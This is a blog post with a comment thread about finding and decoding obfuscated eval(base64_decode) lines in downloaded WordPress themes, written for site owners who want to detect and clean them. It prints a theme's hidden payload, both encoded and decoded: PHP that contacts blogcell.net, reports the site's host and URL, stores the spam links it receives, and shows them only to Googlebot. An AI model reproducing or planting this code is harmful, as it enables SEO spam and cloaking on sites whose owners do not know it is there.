WordPress themes with eval and base64_decode lines
Lately I’ve been downloading and reading myself up on WordPress themes and stumbled upon something curious. Many themes had encrypted code/lines starting with the following code
Example 1
eval(base64_decode('abcdefgh....')
and other variations like
Example 2
eval(gzinflate(str_rot13(base64_decode('abcdefgh...')
This made me curious about why would someone make such an effort to obfuscate their code. Personally I would like to know what code my themes are running so it was not an option not to decode these eval lines in my WordPress themes. This made me wonder if many of my themes that had these lines of code and a simple command from the console would reveal all my themes that had encoded code from the wp-content/themes katalog on your WordPress installation
grep eval |grep decode | grep php * -R
I had several themes containing code of hiding code and some of the themes had hacks that made traffic redirects to other sites.
Decoding Example 1 can be performed by using the following script and inserting the encrypted text in variable $a.
The PHP decoder script
The encrypted text is taken from a unnamed random theme I have downloaded.
<?php $a = 'ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO3ByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApO2lmKCRhZHdiX3RtcFsxXSE9IiIpeyRhZHdiX29wdCA9IGFycmF5KHRpbWUoKSwgJGFkd2JfdG1wWzFdKTskd3BkYi0+cXVlcnkoIlVQREFURSAkd3BkYi0+b3B0aW9ucyBTRVQgb3B0aW9uX3ZhbHVlPSciLm15c3FsX2VzY2FwZV9zdHJpbmcoc2VyaWFsaXplKCRhZHdiX29wdCkpLiInIFdIRVJFIG9wdGlvbl9uYW1lPSdhZHdiX29wdCciKTt9fWlmIChlcmVnaSgiZ29vZ2xlYm90IiwkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtpZiAoJGFkd2Jfb3B0WzFdIT0iIillY2hvICRhZHdiX29wdFsxXTt9fSBhZGRfYWN0aW9uKCJ3cF9mb290ZXIiLCAid3BfZ2V0X2Zvb3Rlcl9tZXRhIik7'; function a($a){ return base64_decode($a);} while(!$b){ if(substr($a,0,4) == 'eval' || !$count){ $a = a(str_replace(Array('eval(base64_decode(\'','\')));'),'',$a); $count++; }else $b = true; } echo $a; ?>
To run it from a console window you can do the following, not as a privileged user in case it does something nasty.
php scriptname.php > result.txt
My text would output the following text to the result.txt file
function wp_get_footer_meta() { global $wpdb; if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))$adwb_opt = unserialize($adwb_opt); else{$adwb_opt = array(0,''); $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')"); } if ((time()-$adwb_opt[0]) >= 3600){$adwb_host = 'blogcell.net'; $adwb_get = '/wpam/';$adwb_soc = @fsockopen($adwb_host,80,$_en,$_es,30); if ($adwb_soc) { @stream_set_timeout($adwb_soc,30); @fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n"); $adwb_data = ''; while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024); $adwb_data = trim(strstr($adwb_data,"\r\n\r\n")); } @fclose($adwb_soc); preg_match('/(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp); if($adwb_tmp[1]!=""){$adwb_opt = array(time(), $adwb_tmp[1]); $wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' HERE option_name='adwb_opt'"); } } if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT'])){if ($adwb_opt[1]!="")echo $adwb_opt[1]; } } add_action("wp_footer", "wp_get_footer_meta");
You should then decide if the decoded code is something you would like to run on your WordPress site. Some themes are doing this to hide their WordPress theme tricks while other do it to do nasty stuff like redirecting traffic from your site to other sites, etc.
Hello,
I came here by searching blogcell.net on google. Today i found this code in my theme (functions.php), almost axactly the same, what should i do? I deleted al the code but that did my sidebar disappear. What part can be removed? I become curious when i noticed blogcell.net. I dont remember ever seen or using blogcell.net. Whats your suggestion?
thx in advance!
Hi,
Instead of deleting the code altogether you can decode it. Replace the decoded content with the encrypted code. Then you can delete the lines that you don’t like and maintain the layout, like your missing sidebar.
This is a site I have used lately to decode online: http://www.motobit.com/util/base64-decoder-encoder.asp. You might have to decode it several times because it is usually coded many times. I have seen up to 15 times!
If you do not understand PHP code you could instead look at the page source in your Internet browser and recreate the code that you deleted in your functions.php file. But no mather how you do it, you should know how to edit some HTML code.
Hope this was of any help.
Hi,
thx for the quick answer. I’ve tried a few things but in doesn’t work, I think i forget some html codes. Would you decode the file for me and send it back? I can give you the comments.php. Donation trough paypal is possible.
L8er dude
Hi,
I’ll give it a go if you send me the whole theme zipped.
Then I can try it out and see if I manage to fix it for you.
That sounds great, i hope I’ve don’t get any other code instead ;-) The problem is in the functions.php, not the comments.php as above. thx in advance!
http://rapidshare.com/files/298551366/v6.0.zip.html
This is the content of the decoding functions.php eval(base64_decode… line.
As you can see it contains a lot of code you do not wish to be in your WordPress theme file, like contacting blogcell.net where it can receive data like spam info etc.
It does also do a check if you are a Google search bot (googlebot”,$_SERVER[‘HTTP_USER_AGENT) and displays a spam free page. This is done to avoid being removed from Google search index and continue to spread spam.
Replace the function above and try this code instead
Let me know if this solves your problem.
The base64_ code is located between )); and )); in the functions.php If I remove the code and replace it with the one that is decoded (with the unwanted lines) I get an error. The same problem with the new code without the unwanted lines. Do I have to put the new code between )); and )); also?
Just comment out the whole line starting with eval(base64_decode… and insert the code I wrote in my previous comment.
I’ve figured it out where to put it, first I deleted the base64_code and insert the new code on top of the functions.php file, right after <?php and ended with } Awesome! It works. My hosting company had difficulties with my website a week ago. After contacting them because my blog was down, with warnings like ‘Error establishing a database connection’ and in phpMyAdmin: #1040 – Too many connections. They noticed that it made to many open MySQL connections (locked). They asked me to fix that, could this be the possible reason?
I do not think this could be the problem…
My weblog is still running, thanks again for your excellent help!
No problem :)